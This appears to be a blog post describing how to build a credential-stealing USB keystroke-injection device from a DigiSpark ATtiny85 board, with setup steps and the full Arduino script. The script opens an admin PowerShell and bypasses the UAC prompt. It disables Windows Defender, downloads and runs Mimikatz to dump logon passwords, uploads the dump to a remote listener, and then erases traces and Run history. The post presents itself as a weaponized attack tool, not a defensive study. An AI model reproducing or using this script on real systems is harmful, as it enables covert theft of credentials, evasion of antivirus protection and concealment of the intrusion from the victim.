What’s DigiSpark ?
DigiSpark is one of the smallest Arduino development boards based on an Attiny85 microcontroller. It’s built to work on USB’s 5V, consists of ~6k flash memory and 6 I/O Pins. The actual charm about it is that it’s cheap and affordable, yet powerful enough to run weaponized scripts.
The great plan
Programming the DigiSpark to do a fast and stealth as possible credential theft from the Windows system. It’s been imagined as a fast way to access credentials from an unattended system by representing itself as a HID (Human Interface Device / Keyboard).
The process is following:
- Run a PowerShell session as Admin
- Disable protection for script execution policy
- Disable active scanning for Windows Defender
- Download and execute MimiKatz to pull creds
- Convert the output to a string
- Upload the string into PHP listener
- Revert AV and policy changes
- Clear leftover logs and files
- Blink the LED for being done
Setting up software
Since DigiSpark is a microcontroller, it requires and IDE with proper drivers to be programmed.
In this scenario we will be using Ardunio IDE which is available to download at the following link.
After setting it up, extra drivers are required for support on Digispark
- Head to File – Preferences
- In the box named “Additional Boards Manager URL” add the following
http://digistump.com/package_digistump_index.json
- Click OK
- Head to Tools menu
- Click Boards Manager which is located in Board submenu
- Search for DigiStump and install the drivers
Now you’re all set!
Connect the DigiSpark, and start uploading Your code from the Arduino IDE.
Script
#include "DigiKeyboard.h"
void setup() {
pinMode(1, OUTPUT); // on-board led for model A
}
void loop() {
DigiKeyboard.delay(6000); // wait 6 sec before start
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT); // Win + X
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_A); // Run PowerShell as admin
DigiKeyboard.delay(2000); // Delay for laggy PC-s
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT); // select yes on UAC prompt
DigiKeyboard.sendKeyStroke(KEY_ENTER); // confirm the prompt
DigiKeyboard.delay(1000);
DigiKeyboard.println("Set-ExecutionPolicy Unrestricted"); // Enable running scripts policy
DigiKeyboard.delay(1000);
DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $true"); // Disable Windows defender
DigiKeyboard.delay(1000);
DigiKeyboard.println("cd $ENV:temp"); // Navigate into temp dir
DigiKeyboard.delay(1000);
DigiKeyboard.println("Invoke-WebRequest -Uri 'Can'tHostAnymore' -OutFile 'mimi.exe'");
DigiKeyboard.delay(1000);
DigiKeyboard.println("./mimi.exe 'sekurlsa::logonpasswords full' >> dump.file"); // Call mimikatz to dump system credentials
DigiKeyboard.delay(1000);
DigiKeyboard.println("$output = Get-Content dump.file"); //Convert output to string, preupload
DigiKeyboard.delay(1000);
DigiKeyboard.println("(New-Object Net.WebClient).UploadString('PHPI'mNotHosting', $output)"); //Upload to listener
DigiKeyboard.delay(1000);
DigiKeyboard.println("Remove-Item mimi.exe"); // Remove mimikatz
DigiKeyboard.delay(1000);
DigiKeyboard.println("Set-ExecutionPolicy Restricted"); // Revert policy
DigiKeyboard.delay(1000);
DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $false"); // Enable Windows defender
DigiKeyboard.delay(1000);
DigiKeyboard.println("Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"); //Remove RUN prompt history
DigiKeyboard.delay(1000);
DigiKeyboard.println("exit"); // Exit PowerShell
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
digitalWrite(1, HIGH); // LED indicator, ready to remove
DigiKeyboard.delay(10000);
}I think the code is pretty straightforward and comments are simple, listener script is available at the repository. (Update: Repo has been removed, message me for code)
This is still in early alpha, so expect a lot of changes to be made.
Bash script for automating install of the server side is still in progress.
Thanks for reading!